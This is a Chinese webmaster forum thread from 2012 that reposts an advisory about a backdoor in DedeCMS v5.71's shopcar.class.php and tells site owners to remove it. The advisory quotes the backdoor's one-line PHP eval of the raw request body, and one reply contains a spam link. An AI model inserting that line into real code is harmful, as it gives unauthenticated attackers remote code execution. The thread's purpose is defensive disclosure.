源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

标题: 织梦(DedeCMS)v5.71后门远程代码执行漏洞提醒广大站长注意 [打印本页]

作者: administrator 时间: 2012-3-30 17:59
标题: 织梦(DedeCMS)v5.71后门远程代码执行漏洞提醒广大站长注意
DEDECMS是织梦内容管理系统，国内一款基于PHP+MySQL的技术开发的，支持多种服务器平台的PHP网站内容管理系统。

DedeCMS某些版本/include/shopcar.class.php文件中，被添加后门代码，远程未验证的攻击者利用该后门可以执行任意命令。

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

*直接找到站点include目录下shopcar.class.php文件，去掉里面的代码
@eval(file_get_contents('php://input'));即可。

作者: xbjfc 时间: 2012-4-10 16:37
做个记号，下次好找！

www.mdwjc.com 玉米秸秆收割机

作者: 独孤加倍 时间: 2012-5-20 22:00
漏洞真多啊

欢迎光临源码论坛,商业源码下载,尽在锦尚中国商业源码论坛 (https://bbs.52jscn.com/)